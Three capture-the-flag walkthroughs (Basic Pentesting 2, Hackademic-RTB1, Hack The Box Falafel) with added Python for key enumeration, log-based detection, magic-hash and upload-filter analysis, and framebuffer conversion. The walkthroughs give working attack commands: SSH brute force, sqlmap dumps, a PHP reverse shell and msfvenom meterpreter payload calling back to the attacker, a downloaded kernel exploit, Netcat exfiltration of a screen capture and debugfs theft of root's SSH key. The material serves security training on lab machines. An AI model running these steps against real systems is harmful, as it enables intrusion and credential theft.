Hack the Basic Pentesting:2 VM (CTF Challenge)


Basic pentesting 2 is a boot2root VM and is a continuation of the Basic Pentesting series by Josiah Pierce. This series is designed to help newcomers to penetration testing develop pentesting skills and have fun exploring part of the offensive side of security.
VirtualBox is the recommended platform for this challenge (though it should also work with VMware -- however, I haven’t tested that).
This VM is a moderate step up in difficulty from the first entry in this series. If you’ve solved the first entry and have tried a few other beginner-oriented challenges, this VM should be a good next step. Once again, this challenge contains multiple initial exploitation vectors and privilege escalation vulnerabilities.
Your goal is to remotely attack the VM, gain root privileges, and read the flag located at /root/flag.txt.
You can download it from here.
Penetrating Methodologies
§  Port scanning
§  Used enum4linux to enumerate all the users
§  SSH bruteforce for the user jan
§  Found the passphrase-protected SSH private key (id_rsa) of user kay
§  Used ssh2john to convert that private key into a hash John the Ripper can crack
§  Used John the Ripper to crack the hash and recovered the passphrase
§  Logged into user kay using the passphrase
§  Attained the file pass.bak
§  Got root access to the lab using password in pass.bak
§  Captured the flag
Let’s start!!
Let's begin by scanning the target for open ports and services with nmap; -A turns on version detection, default scripts and OS detection.
nmap -A 192.168.1.139




The scan shows, among other services, port 22 (SSH) open, but we have no usernames to try yet. enum4linux enumerates users over SMB, so let's run it against the target:
enum4linux 192.168.1.139




enum4linux reports two local users: jan and kay.




Let's brute-force jan's SSH login with hydra, which comes pre-installed in Kali, using the rockyou.txt wordlist (-l fixes the username, -P supplies the password list):
hydra -l jan -P /usr/share/wordlists/rockyou.txt 192.168.1.139 ssh




Hydra finds a valid login for jan:
Username: jan
Password: armando
Now log in over SSH with the cracked credentials:
ssh jan@192.168.1.139




We have a shell as jan, but jan has no sudo rights (sudo -l confirms it). Let's look for other users' home directories and what they contain.
cd /home
ls
There is another home directory, kay. Go inside it and list everything, including the hidden .ssh directory:
cd kay
ls -la
cd .ssh
ls -la




The id_rsa file is kay's private SSH key, and it is readable by jan. Read it with cat id_rsa, copy the whole block including the BEGIN and END lines, and save it on the attacking machine as a file named key.




The key is passphrase-protected, so convert it with ssh2john into a hash that John the Ripper can attack (on Kali the script lives at /usr/share/john/ssh2john.py), then run john on it. John's default cracking modes are used here; a wordlist can be supplied with --wordlist, and --show prints what has already been cracked.
python /usr/share/john/ssh2john.py key > ssh_login
john ssh_login
john --show ssh_login




John recovers the phrase "beeswax". This could be the key's passphrase or a password reused somewhere else as we move on. Let's log in as kay with the key; SSH refuses private keys with permissive file modes, so restrict the file first:
chmod 600 key
ssh -i key kay@192.168.1.139
SSH prompts for the passphrase; enter "beeswax".




We now have a shell as kay. In kay's home directory there is a file named pass.bak, which looks worth reading:
cat /home/kay/pass.bak
It contains the string "heresareallystrongpasswordthatfollowsthepasswordpolicy$$".
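The enumeration jan did by hand above (walk the home directories for readable private keys and backup files, and find out whether a key needs a passphrase before spending time on john) is worth scripting for the next box. The Python below is an added example, not part of the original walkthrough: it parses the header of legacy PEM keys and of the newer openssh-key-v1 format to tell encrypted keys from plain ones, and it scans a constructed stand-in for /home built in a temporary directory with placeholder contents, so it runs offline. On a real target, point scan() at /home.

```python
"""Post-exploitation enumeration of a home-directory tree: list readable private
keys and backup files and say whether each key needs a passphrase.
Added example, not part of the original walkthrough. The tree it scans is
constructed in a temporary directory with placeholder contents so the script
runs offline; point scan() at /home on a real target."""
import base64
import os
import stat
import struct
import tempfile

PEM_KEY_HEADERS = (
    b"-----BEGIN OPENSSH PRIVATE KEY-----",
    b"-----BEGIN RSA PRIVATE KEY-----",
    b"-----BEGIN EC PRIVATE KEY-----",
    b"-----BEGIN DSA PRIVATE KEY-----",
    b"-----BEGIN PRIVATE KEY-----",
    b"-----BEGIN ENCRYPTED PRIVATE KEY-----",
)
BACKUP_SUFFIXES = (".bak", ".old", ".orig", ".save", "~")


def key_protection(data):
    """Classify a private-key blob as 'passphrase', 'none' or 'unknown'."""
    if b"-----BEGIN OPENSSH PRIVATE KEY-----" in data:
        # New-format key: the base64 body starts with "openssh-key-v1\0" and a
        # length-prefixed cipher name; "none" means the key is unencrypted.
        body = b"".join(l for l in data.splitlines() if not l.startswith(b"-----"))
        body = body[: len(body) // 4 * 4]  # tolerate a truncated read
        try:
            raw = base64.b64decode(body)
        except ValueError:
            return "unknown"
        magic = b"openssh-key-v1\x00"
        if not raw.startswith(magic) or len(raw) < len(magic) + 4:
            return "unknown"
        off = len(magic)
        (n,) = struct.unpack(">I", raw[off:off + 4])
        cipher = raw[off + 4:off + 4 + n]
        return "none" if cipher == b"none" else "passphrase"
    if b"Proc-Type: 4,ENCRYPTED" in data or b"BEGIN ENCRYPTED PRIVATE KEY" in data:
        return "passphrase"  # legacy PEM with DEK-Info, or encrypted PKCS#8
    if any(h in data for h in PEM_KEY_HEADERS):
        return "none"
    return "unknown"


def scan(root):
    """Walk root; return sorted (relative path, kind, world_readable) tuples for
    files the current user can read that look like private keys or backups."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not os.access(path, os.R_OK):
                continue  # skip symlinks, devices and files we cannot open anyway
            world_readable = bool(st.st_mode & stat.S_IROTH)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(4096)
            except OSError:
                continue
            rel = os.path.relpath(path, root)
            if any(h in head for h in PEM_KEY_HEADERS):
                findings.append((rel, "private-key/" + key_protection(head), world_readable))
            elif name.endswith(BACKUP_SUFFIXES):
                findings.append((rel, "backup-file", world_readable))
    return sorted(findings)


def _write(path, data, mode):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)
    os.chmod(path, mode)


def build_demo_tree(root):
    """Constructed stand-in for /home on the target; no real key material."""
    # kay's legacy PEM key: passphrase-protected but readable by everyone
    legacy = (b"-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
              b"DEK-Info: AES-128-CBC,00000000000000000000000000000000\n\n"
              b"AAAA\n-----END RSA PRIVATE KEY-----\n")
    _write(os.path.join(root, "kay", ".ssh", "id_rsa"), legacy, 0o644)
    # a new-format key with cipher "none" (no passphrase), correctly locked down
    blob = (b"openssh-key-v1\x00" + struct.pack(">I", 4) + b"none"
            + struct.pack(">I", 4) + b"none")
    newfmt = (b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(blob)
              + b"\n-----END OPENSSH PRIVATE KEY-----\n")
    _write(os.path.join(root, "jan", ".ssh", "id_ed25519"), newfmt, 0o600)
    _write(os.path.join(root, "kay", "pass.bak"), b"placeholder\n", 0o644)
    _write(os.path.join(root, "kay", "notes.txt"), b"nothing here\n", 0o644)


def demo():
    """Build the constructed tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_tree(root)
        return scan(root)


if __name__ == "__main__":
    for rel, kind, world in demo():
        print(f"{kind:24} world-readable={str(world):5} {rel}")
```

Two things the output makes obvious that a directory listing does not: which keys are worth feeding to ssh2john at all (an unencrypted key is usable as-is), and which files are readable by everyone rather than just by their owner, which is the actual misconfiguration on this box.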
Now check kay's sudo rights with sudo -l. sudo asks for kay's own password, not root's; the string from pass.bak works, and the output shows that kay may run ALL commands.
sudo -l
sudo su
That gives us a root shell. Let's check the /root directory:
cd /root
ls
cat flag.txt
The flag is in /root/flag.txt, as promised. Happy hacking!


Hack the Hackademic-RTB1 VM (Boot to Root)


Hello friends! Today we are going to solve a simple CTF challenge from VulnHub: Hackademic-RTB1, the first realistic "root this box" challenge by mr.pr0n. Download the target from here and get root.
Penetrating Methodologies
  • Network Scanning (Nmap, netdiscover)
  • Wordpress (CMS) based SQLMAP Scanning
  • Extract databases and Wordpress user credentials
  • Login into the Wordpress admin console with specific user
  • Upload and execute a Reverse shell
  • Reverse connection (Metasploit)
  • Exploiting target (exploit 15285)
  • Get Root access and capture the flag.
Let’s Start!!!
Start off with finding the target using:
netdiscover




Our target is 192.168.1.104. Now scan all TCP ports on it with nmap:
nmap -p- -A 192.168.1.104
The nmap scan shows ports 22 and 80. Let's target the web server on port 80 first.




Browse to http://192.168.1.104 and a page opens as shown below. Click on the word "target" in the sentence "Please go to your target and try to get root".




Upon clicking the target, below page will open http://192.168.1.104/Hackademic_RTB1/




Clicking on Uncategorized redirects to http://192.168.1.104/Hackademic_RTB1/?cat=1
Let's test the cat parameter for SQL injection by appending a single quote ('). The database error shown in the image tells us two things: the site runs WordPress, and the cat parameter is injectable.
http://192.168.1.104/Hackademic_RTB1/?cat=1'




Using the above URL, enumerate the databases with sqlmap (--batch accepts the default answer to every prompt):
sqlmap -u "http://192.168.1.104/Hackademic_RTB1/?cat=1" --dbs --batch
Note: wpscan can be run alongside sqlmap to fingerprint the WordPress version, plugins and users, but it does not exploit the injection or dump the database.





Once sqlmap finishes, it lists the databases available to the application; wordpress is the one we want.




Dump the tables of the wordpress database with sqlmap (the user accounts and their password hashes live in wp_users):
sqlmap -u "http://192.168.1.104/Hackademic_RTB1/?cat=1" -D wordpress --dump-all --batch





When sqlmap finds password hashes it offers to crack them with its built-in dictionary; with --batch it does so automatically.




Browse to the WordPress login page http://192.168.1.104/Hackademic_RTB1/wp-login.php and log in with the recovered credentials. Of the users, GeorgeMiller is the useful one: his admin panel exposes far more options than the others, including the ability to add and modify PHP files.
After logging in, navigate to Manage > Files and open the hello.php plugin file. Replace its contents with Kali's PHP reverse shell (/usr/share/webshells/php/php-reverse-shell.php), after editing the $ip and $port variables in that script to point at your listener.
Once the contents are pasted into hello.php, click Update file.




Access the URL http://192.168.1.104/Hackademic_RTB1/wp-content/plugins/hello.php



Start a Netcat listener on the port you put in the shell (nc -lvnp <port>) and request the URL again; the listener receives a limited shell as the web server user. Checking the kernel version (uname -a) suggests it may be vulnerable to a local privilege escalation.
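Every step of this chain leaves a trace in the web server's access log: the quote probe on ?cat=1, sqlmap's User-Agent and UNION payloads, the POST to the plugin editor that rewrote hello.php, and finally the direct GET to a file under wp-content/plugins/. The Python below is an added example, not from the original walkthrough: detection logic that tags those four patterns in Apache combined-format log lines. The log lines it runs over are constructed to mirror the requests made in this write-up (IPs and timestamps are made up).

```python
"""Detection logic for the attack chain above, run over constructed Apache
combined-format access-log lines that mirror the requests in this write-up.
Added example, not from the original walkthrough. It tags SQL-injection probes
in query parameters, the sqlmap User-Agent, writes through the WordPress
plugin/theme editor, and direct requests to PHP files under wp-content/plugins/."""
import re
from urllib.parse import parse_qsl, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

SQLI_PATTERNS = [
    re.compile(r"""['"]\s*(or|and)\b""", re.I),                # ' or 1=1
    re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+", re.I),          # 1 and 1=1
    re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),          # union select
    re.compile(r"\b(sleep|benchmark|updatexml|extractvalue)\s*\(", re.I),
    re.compile(r"(--|#|/\*)\s*$"),                               # trailing comment
]
PLUGIN_PHP = re.compile(r"/wp-content/plugins/[^?]*\.php$", re.I)
EDITOR = re.compile(r"/wp-admin/(plugin|theme)-editor\.php$", re.I)

# Constructed sample log (not a real capture); one line per step of the attack.
SAMPLE_LOG = """\
192.168.1.107 - - [10/Apr/2018:10:01:02 +0000] "GET /Hackademic_RTB1/?cat=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.1.107 - - [10/Apr/2018:10:01:09 +0000] "GET /Hackademic_RTB1/?cat=1%27 HTTP/1.1" 500 912 "-" "Mozilla/5.0"
192.168.1.107 - - [10/Apr/2018:10:02:15 +0000] "GET /Hackademic_RTB1/?cat=1%20AND%201=1 HTTP/1.1" 200 5123 "-" "sqlmap/1.2.4#stable (http://sqlmap.org)"
192.168.1.107 - - [10/Apr/2018:10:02:16 +0000] "GET /Hackademic_RTB1/?cat=1%20UNION%20ALL%20SELECT%20NULL,CONCAT(user_login,0x3a,user_pass),NULL%20FROM%20wp_users-- HTTP/1.1" 200 6801 "-" "sqlmap/1.2.4#stable (http://sqlmap.org)"
192.168.1.107 - - [10/Apr/2018:10:05:40 +0000] "POST /Hackademic_RTB1/wp-admin/plugin-editor.php HTTP/1.1" 302 0 "http://192.168.1.104/Hackademic_RTB1/wp-admin/plugin-editor.php" "Mozilla/5.0"
192.168.1.107 - - [10/Apr/2018:10:06:01 +0000] "GET /Hackademic_RTB1/wp-content/plugins/hello.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.1.50 - - [10/Apr/2018:10:06:30 +0000] "GET /Hackademic_RTB1/wp-content/themes/default/style.css HTTP/1.1" 200 4200 "-" "Mozilla/5.0"
"""


def analyze(line):
    """Return (ip, url, tags) for a suspicious line, or None for a clean one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    tags = []
    if "sqlmap" in m["ua"].lower():
        tags.append("sqlmap-ua")
    parts = urlsplit(m["url"])
    # parse_qsl percent-decodes each value once, so ?cat=1%27 is seen as 1'
    for _key, value in parse_qsl(parts.query, keep_blank_values=True):
        if value.endswith(("'", '"')) or any(p.search(value) for p in SQLI_PATTERNS):
            tags.append("sqli-probe")
            break
    if m["method"].upper() == "POST" and EDITOR.search(parts.path):
        tags.append("plugin-editor-write")  # file edited through wp-admin
    if PLUGIN_PHP.search(parts.path):
        tags.append("plugin-php-direct")    # plugin file invoked directly
    return (m["ip"], m["url"], tags) if tags else None


def detect(log_text):
    """Run analyze() over every line and keep only the hits."""
    return [hit for hit in map(analyze, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for ip, url, tags in detect(SAMPLE_LOG):
        print(ip, ",".join(tags), url)
```

The single most reliable signal here is the last one: WordPress never serves plugin files directly in normal operation, so a 200 on a GET to wp-content/plugins/<anything>.php from a client that just POSTed to plugin-editor.php is worth an alert on its own, whatever the User-Agent says.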



A search for privilege-escalation exploits matching kernel 2.6.31 (shown in the image above) turned up the RDS protocol local privilege escalation, Exploit-DB 15285 (CVE-2010-3904, by Dan Rosenberg); it is also available offline on Kali through searchsploit.

https://www.exploit-db.com/exploits/15285



Run searchsploit 15285 to locate the exploit, copy the file (15285.c) to the Kali desktop, and serve it with Python's built-in HTTP server on port 80 (the port used in the wget URL below):
searchsploit -m 15285
sudo python3 -m http.server 80





Now move to the victim's /tmp directory and use wget to fetch the file from Kali:
cd /tmp
wget http://192.168.1.107/15285.c
ls
Once the file is in /tmp, compile it and make it executable:
gcc 15285.c -o kernel
chmod +x kernel




Run the binary; it exploits the vulnerability and drops into a root shell:
./kernel
Once it returns, change into /root and list its contents:
cd /root
ls
We are now in a privileged shell and can see key.txt; read it to finish the challenge.
Hurrah! We hit the goal.



Hack the Box Challenge: Falafel Walkthrough


Hello friends!! Today we are going to solve another CTF challenge, "Falafel", available online for those who want to sharpen their penetration-testing and black-box testing skills. Falafel is a retired vulnerable lab from Hack The Box, which hosts a collection of vulnerable labs ranging from beginner to expert level.
Level: Hard
Task: find user.txt & root.txt file on victim’s machine

Since these labs are hosted online they have static IPs; Falafel's is 10.10.10.73, so let's begin with nmap port enumeration.
nmap -A 10.10.10.73
The scan shows ports 22 (SSH) and 80 (HTTP) open.





Browsing to the target IP brings up a login page.





With nothing remarkable on the login page, I ran DirBuster for a directory brute-force. It turned up many files, but /cyberlaw.txt looked the most interesting, so I browsed to http://10.10.10.73/cyberlaw.txt and found a message.





The message tells us there is an admin account with a serious security problem, that an attacker can take over the website through the image-upload feature, and it hints at a filter on the URL.





We then tried SQL injection in the login form, which returned the error "Wrong identification: admin".






Next we turned to sqlmap, letting --forms pick up the login form fields and passing "Wrong identification" with --string so that a response containing that text counts as the true case for boolean-based injection:
sqlmap -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" --dbs --batch





This reveals a database named "falafel"; now let's extract its tables and contents.





sqlmap -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" -D falafel --tables --batch
sqlmap -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" -D falafel -T users --dump --batch
This dumps the users table, with usernames and password hashes as shown.




The admin password hash begins with 0e followed only by digits. I had not seen this kind of hash before, so a quick search led to the topic of PHP "magic hashes": when PHP compares two strings with == and both look numeric, it compares them as numbers, and a string of the form 0e<digits> is read as 0 times a power of ten, i.e. zero. Any input whose MD5 also has the form 0e<digits> therefore compares equal to the stored hash.




As the highlighted entry shows, the MD5 of the 32-character magic-hash string is the same as the admin hash above.
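To see why the login accepts a password whose hash is not byte-for-byte the stored one, here is an added Python example (not from the original write-up or the box's code): php_loose_equal() emulates the part of PHP's == that matters, the numeric-string rule, and the vulnerable and fixed login checks are placed side by side. ADMIN_HASH is md5("240610708"), the credential found above; "QNKCDZO" is a second well-known string whose MD5 is also of the 0e form.

```python
"""Why the admin password "240610708" works against a hash that is not its
own: PHP's loose comparison (==) turns a string of the form 0e<digits> into
the float 0.0, so every "magic" MD5 compares equal to every other one.
Added example, not from the original write-up; php_loose_equal() emulates
only the part of PHP's string comparison that matters here."""
import hashlib
import hmac
import re

# admin's hash from the dump above; it is md5("240610708")
ADMIN_HASH = "0e462097431906509019562988736854"
NUMERIC_STRING = re.compile(r"^[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")
MAGIC_MD5 = re.compile(r"^0e\d+$")


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def php_loose_equal(a, b):
    """Emulate PHP `$a == $b` for two strings: when both are numeric strings
    they are compared as numbers, otherwise byte by byte."""
    if NUMERIC_STRING.match(a) and NUMERIC_STRING.match(b):
        return float(a) == float(b)   # "0e462..." -> 0.0, "0e830..." -> 0.0
    return a == b


def is_magic_md5(s):
    """True when md5(s) looks like 0e<digits>, i.e. evaluates to 0 in PHP."""
    return MAGIC_MD5.match(md5_hex(s)) is not None


def vulnerable_login(stored_hash, password):
    """What the login does in effect: if (md5($password) == $row['password'])."""
    return php_loose_equal(md5_hex(password), stored_hash)


def fixed_login(stored_hash, password):
    """Strict, constant-time comparison (=== / hash_equals() in PHP). Storing
    unsalted MD5 is still wrong; use password_hash()/password_verify()."""
    return hmac.compare_digest(md5_hex(password), stored_hash)


if __name__ == "__main__":
    for candidate in ("240610708", "QNKCDZO", "password"):
        print(f"{candidate:10} md5={md5_hex(candidate)} magic={is_magic_md5(candidate)} "
              f"vulnerable={vulnerable_login(ADMIN_HASH, candidate)} "
              f"fixed={fixed_login(ADMIN_HASH, candidate)}")
```

Note that the fix is not "use a stronger hash": the same bug exists with SHA-1 or SHA-256 hex digests as long as they are compared with ==. The fix is strict comparison, and ideally password_verify(), which never exposes the digest string to a loose comparison at all.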




With the following credentials we log in to the admin dashboard and move to the upload option.
Username: admin
Password: 240610708





Here we try to upload a PHP file named shell.php, but it fails with the error "Bad extension", as shown.

We then rename it shell.php.png and try again.




The file with the .png extension uploads successfully into /var/www/html/uploads, so the check only looks at the final suffix; a malicious PHP file or backdoor can be uploaded the same way with .png appended.






Let's create a PHP payload to upload to the website, using msfvenom to generate the PHP backdoor:

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.25 lport=4444 -f raw
Now copy the code from * and paste in a text file  then as rajjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj.php.png (240 character) also start multi handler in a new terminal.






To be clear: the upload handler truncates long filenames after checking the extension. With a name of exactly the right length the trailing .png is cut off and the file is saved ending in .php, which is why the filename length matters: the full name including .php.png has to be long enough that the cut lands just after .php.
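The two weaknesses just used, a suffix-only extension check and a truncation applied after it, modelled in Python next to a hardened version. This is an added example and not the box's upload code: the 240-character limit is the figure given above, while the handler itself and the filler character are assumptions.

```python
"""The upload filter's two weaknesses, modelled side by side with a hardened
version: the extension check only inspects the final suffix, and the stored
filename is truncated to a fixed length after that check, so a name of the
right length loses its decoy ".png" and is saved as ".php". Added example,
not the site's code: the 240-character limit is the figure given in the text,
the handler itself and the filler character are assumptions."""
import os
import secrets

ALLOWED = (".png", ".jpg", ".jpeg", ".gif")
NAME_LIMIT = 240


def vulnerable_saved_name(filename, limit=NAME_LIMIT):
    """Suffix check first, truncation second: the order is the bug."""
    if not filename.lower().endswith(ALLOWED):
        raise ValueError("Bad extension")
    return filename[:limit]


def craft_filename(limit=NAME_LIMIT, real_ext=".php", decoy_ext=".png", filler="r"):
    """Name that passes the suffix check yet truncates to exactly real_ext."""
    return filler * (limit - len(real_ext)) + real_ext + decoy_ext


def hardened_saved_name(filename):
    """Never reuse the client's name: whitelist the extension, then generate a
    short random stem, so neither length nor embedded dots matter."""
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in ALLOWED:
        raise ValueError("Bad extension")
    return secrets.token_hex(16) + ext


def is_rejected(handler, filename):
    """True if the handler refuses the name with 'Bad extension'."""
    try:
        handler(filename)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    name = craft_filename()
    print(len(name), "...", name[-12:])
    saved = vulnerable_saved_name(name)
    print(len(saved), "...", saved[-8:])
    print(hardened_saved_name(name))
```

Two caveats for the hardened version. First, it must be paired with a web server that will not execute anything in the upload directory; with Apache's AddHandler configured per extension, a file called shell.php.png is executed as PHP even without any truncation, so the handler should be bound with a FilesMatch on a trailing .php instead. Second, the whitelist on the name says nothing about the content, so a PHP file renamed .png still needs the execution restriction above to be harmless.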





As shown in the given image the PHP file is uploaded successfully inside /var/www/html/uploads.





Request the uploaded file in the browser to trigger the reverse shell back to Metasploit.




Meanwhile, return to the Metasploit terminal and wait for the meterpreter session on the multi/handler.

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.25
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > exploit




The image below shows meterpreter session 1. The task is not finished yet; we still need to escalate privileges. Reading /etc/passwd reveals two system users, yossi and moshe.
meterpreter > cat /etc/passwd





After more inspection we found connection.php in /var/www/html, which holds the database credentials:
meterpreter > cd /var/www/html
meterpreter > ls
meterpreter > cat connection.php
This is the MySQL configuration file: username moshe, password falafelIsReallyTasty.





The database password turns out to be reused for moshe's system account. After upgrading the meterpreter shell to a proper tty with python, we SSH in as moshe and read user.txt in /home/moshe:
python -c "import pty;pty.spawn('/bin/bash')"
ssh moshe@10.10.10.73
cd /home/moshe
cat user.txt





Enumerating moshe's groups shows that he is a member of the video group, which grants read access to the framebuffer devices /dev/fb*. The framebuffer holds whatever is currently drawn on the console, so a local user who can read it can capture the screen and may pick up credentials typed by another user; this is the flaw that lets us escalate here.

Let's dump the raw contents of /dev/fb0 into /tmp/screen.raw with cat:
groups
cat /dev/fb0 > /tmp/screen.raw
cd /tmp
ls




Transfer the dump to the attacking machine with Netcat (listening there with nc -lvp 5555 > screen.raw):
nc 10.10.14.25 5555 < screen.raw

The raw dump has no header, so before converting it into a standard image format such as PNG we need the screen dimensions. The following file prints them as width,height:

cat /sys/class/graphics/fb0/virtual_size





Now convert the raw data to PNG, passing the width and height just found:
./iraw2png.pl 1176 885 < screen.raw > screen.png
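For anyone without the Perl script to hand, the conversion is small enough to write with Python's standard library. The block below is an added example, not the iraw2png.pl used above: it assumes 32 bits per pixel in BGRA byte order, the usual layout of /dev/fb0 (check /sys/class/graphics/fb0/bits_per_pixel on the target), drops the alpha byte, and writes an uncompressed-filter truecolor PNG. It also includes a tiny chunk reader so the output can be verified on a constructed 2x2 sample without an image library.

```python
"""Convert a raw /dev/fb0 dump into a PNG with the standard library only, the
job iraw2png.pl does above. Added example, not the original script. It assumes
32 bits per pixel in BGRA byte order, the usual layout of /dev/fb0 (compare
/sys/class/graphics/fb0/bits_per_pixel), and takes width and height from
virtual_size. Usage: python fb2png.py 1176 885 < screen.raw > screen.png"""
import struct
import sys
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

# Constructed 2x2 BGRA sample (not a real capture): row 0 = (b1 g2 r3), (b4 g5 r6)
SAMPLE_RAW = bytes([1, 2, 3, 255, 4, 5, 6, 255, 7, 8, 9, 255, 10, 11, 12, 255])


def _chunk(tag, data):
    """PNG chunk: length, type, data, CRC32 over type+data."""
    return (struct.pack(">I", len(data)) + tag + data
            + struct.pack(">I", zlib.crc32(tag + data) & 0xFFFFFFFF))


def parse_virtual_size(text):
    """/sys/class/graphics/fb0/virtual_size prints 'width,height'."""
    w, h = text.strip().split(",")
    return int(w), int(h)


def raw_bgra_to_png(raw, width, height):
    """Reorder BGRA -> RGB, drop alpha, emit an 8-bit truecolor PNG."""
    stride = width * 4
    if len(raw) < stride * height:
        raise ValueError(f"need {stride * height} bytes, got {len(raw)}")
    rows = []
    for y in range(height):
        line = raw[y * stride:(y + 1) * stride]
        rgb = bytes(v for px in zip(line[2::4], line[1::4], line[0::4]) for v in px)
        rows.append(b"\x00" + rgb)  # filter type 0 (None) for each scanline
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return (PNG_SIG + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(b"".join(rows), 9))
            + _chunk(b"IEND", b""))


def png_chunks(png):
    """Yield (type, data) for every chunk; used to check our own output."""
    off = len(PNG_SIG)
    while off + 8 <= len(png):
        (n,) = struct.unpack(">I", png[off:off + 4])
        yield png[off + 4:off + 8], png[off + 8:off + 8 + n]
        off += 12 + n


def png_dimensions(png):
    for tag, data in png_chunks(png):
        if tag == b"IHDR":
            return struct.unpack(">II", data[:8])
    raise ValueError("no IHDR chunk")


def png_rgb_rows(png):
    """Decode a filter-0 truecolor PNG back into raw RGB scanlines."""
    width, height = png_dimensions(png)
    idat = b"".join(d for t, d in png_chunks(png) if t == b"IDAT")
    data = zlib.decompress(idat)
    row_len = 1 + 3 * width
    return [data[i * row_len + 1:(i + 1) * row_len] for i in range(height)]


if __name__ == "__main__":
    w, h = int(sys.argv[1]), int(sys.argv[2])
    sys.stdout.buffer.write(raw_bgra_to_png(sys.stdin.buffer.read(), w, h))
```

If the picture comes out with wrong colours, the byte order is not BGRA; if it is sheared, the stride in bytes is not width*4 (virtual_size can be wider than the visible width, and that is the value to pass).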



Opening screen.png shows the following image, which reveals the password MoshePlzStopHackingMe! for user yossi.




With this credential we SSH in as yossi. yossi can read the raw block device directly (check with ls -l /dev/sda1 and groups), and debugfs reads the ext filesystem without going through the kernel's permission checks, so root's SSH key can be pulled straight off the disk. df shows which device holds the root filesystem; the cat below is a debugfs command, typed at its prompt.
df
debugfs /dev/sda1
debugfs: cat /root/.ssh/id_rsa
Copy the RSA key into a file named key on your local machine and set its permissions to 600.





Now connect over SSH once more, this time as root with the key file:
chmod 600 key
ssh -i key root@10.10.10.73
ls
cat root.txt